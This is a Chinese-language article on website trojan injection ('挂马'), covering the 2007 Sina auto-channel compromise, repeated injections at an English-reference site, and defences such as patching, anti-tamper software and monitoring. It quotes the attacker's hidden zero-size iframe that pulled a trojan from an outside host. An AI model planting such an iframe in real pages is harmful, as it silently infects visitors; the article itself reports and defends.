何谓挂马？也许有的人听说过但对其并非很了解。“挂马”即将木马链接嵌入网页中，当用户点击该网页时木马链接会自动被激活，直接下载木马程序到用户主机上并窃取各种信息，甚至会控制整个机器。“挂马”危害十分巨大，给网站及用户造成了巨大的损失。

　　其实挂马的原理很简单：首先黑客寻找系统漏洞，发现漏洞后入侵系统，这样就拿到了系统的最高权限。好比控制了人的大脑一样，紧接着对操作系统内部的信息进行改写，并嵌入链接。这样一旦用户点击就会自动进入被修改的网页，被黑客盗取信息。黑客利用系统漏洞频频“挂马”，各网站相继中招，“挂马”事件层出不穷。

 问题 PROBLEM

　　2007年5月22日，国内知名网站新浪网的汽车频道被黑客挂马，该网站的页面（http://buycar.auto.sina.com.cn/price/list_10-15.shtml）被黑客植入病毒，用户如果访问该网站，就会被病毒感染。攻击者利用MS06-014漏洞来传播木马病毒。黑客在该页面上添加了如下内容：<iframesrc=http://www.wg581.com/pao.htmwidth=0height=0></iframe>，与此同时黑客通过多次页面跳转来躲避查杀。其最终链接到http://www.wg581.com/ww.htm下载木马。由于进行了多次链接跳转，使得杀毒软件根本无法及时检测，众多用户中毒。这一挂马事件曾一度成为爆炸性新闻。

　　企业网站被挂马不止新浪一家，作为国内知名的英语资料查询网站搜英语网站，多次遭受黑客“挂马”。对此运营该网站的魁特信息技术有限公司副总经理邓辉显得诸多无奈。据邓经理介绍，搜英语目前主要面临的信息安全问题是木马和病毒。其中木马最令他们头疼，邓辉说：“目前木马对我们威胁比较大，木马现在已经产业化，在木马的防范上我们处于被动的地位。”

　　“挂马”早已成为搜英语的“老朋友”了。早在2006年搜英语就已经遭受黑客“挂马”，搜英语当时只装了杀毒软件，因此对于“挂马”根本束手无策。一开始只是偶尔被“挂马”，到后来“挂马”的频率越来越高。据邓辉介绍，最严重的时候是在2007年的9至10月份，在这段时间里，搜英语网站基本上每天都会被“挂马”。甚至“我们的管理员上午进行完软件测试，下午就会被挂马。”邓经理的话语中带着些许激动。虽然这些“挂马”没有太大的技术难度，但是经常频繁地被“挂马”，技术人员又找不到有效的解决方法。邓经理这样形容此尴尬局面，“网站就好比自家的门口，经常有乞丐出入，虽然没有太大的危害，但是赶也赶不走，实在令人头痛。”

 解决 SOLUTION

　　新浪网为何单独是汽车频道被“挂马”？主要在于人们更多地关注新浪主频道，而忽视了其子频道。因此造成某些子频道的“挂马”时间会比较长。“挂马”技术发展变化极快，使得杀毒软件也束手无策，甚至一些反病毒厂商的网页也有被挂马的经历，例如东方卫士网站曾在2007年3月30日被“挂马”、天网安全阵线网站随后在10月30日也被“挂马”。

　　面对频繁地被“挂马”的搜英语网站，邓辉在长期的反“挂马”实践中也总结了一些经验。据邓辉介绍，搜英语网站首先利用Google搜索引擎或者IE浏览器来进入自己的网站，利用这种“客户”身份来访问可以“引蛇出洞”。如果黑客利用其他网站服务器进行间接“挂马”，装有安全软件插件的浏览器会对用户进行警告提示。一般情况下被“挂马”后的域名都比较特殊，且黑客一般会挂一两个文件。邓辉讲到自己的网站被“挂马”时说：“我们网站的挂马技术还是比较低端的，对用户来说不会存在太大的风险，只是会有警告提示。我们的网站是产业挂马的受害者，产业挂马的势力已经严重影响到网络的安全。”近期邓辉准备从源头上遏制“挂马”。网站工作人员打算购买网页防篡改软件，一旦黑客进入系统修改网页内容时，都会首先经过此软件，这样一来管理员就可以及时监测并有效防止网页被修改。

　　安天实验室的技术人员张晓兵指出，“挂马”的根本在于系统存在漏洞，让黑客有可趁之机，因此及时地给系统定期打补丁是关键；其次，企业缺乏安全意识，对网站安全建设关注不够、投入不足，也是许多网站频频遭遇“挂马”的原因之一，甚至反病毒厂商的网站也同样如此。

　　企业应当加强网站实时监测的力度，在被“挂马”的第一时间内迅速有效地找到解决问题的途径，将损失减至最低；最后不容忽视的是加强第三方的监管力度，确保企业交易的第三方网络安全。这样才可以全面有效地防止被“挂马”。